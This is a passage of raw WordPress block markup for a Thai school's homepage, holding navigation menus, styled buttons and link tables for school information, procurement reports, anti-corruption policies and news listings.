{\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 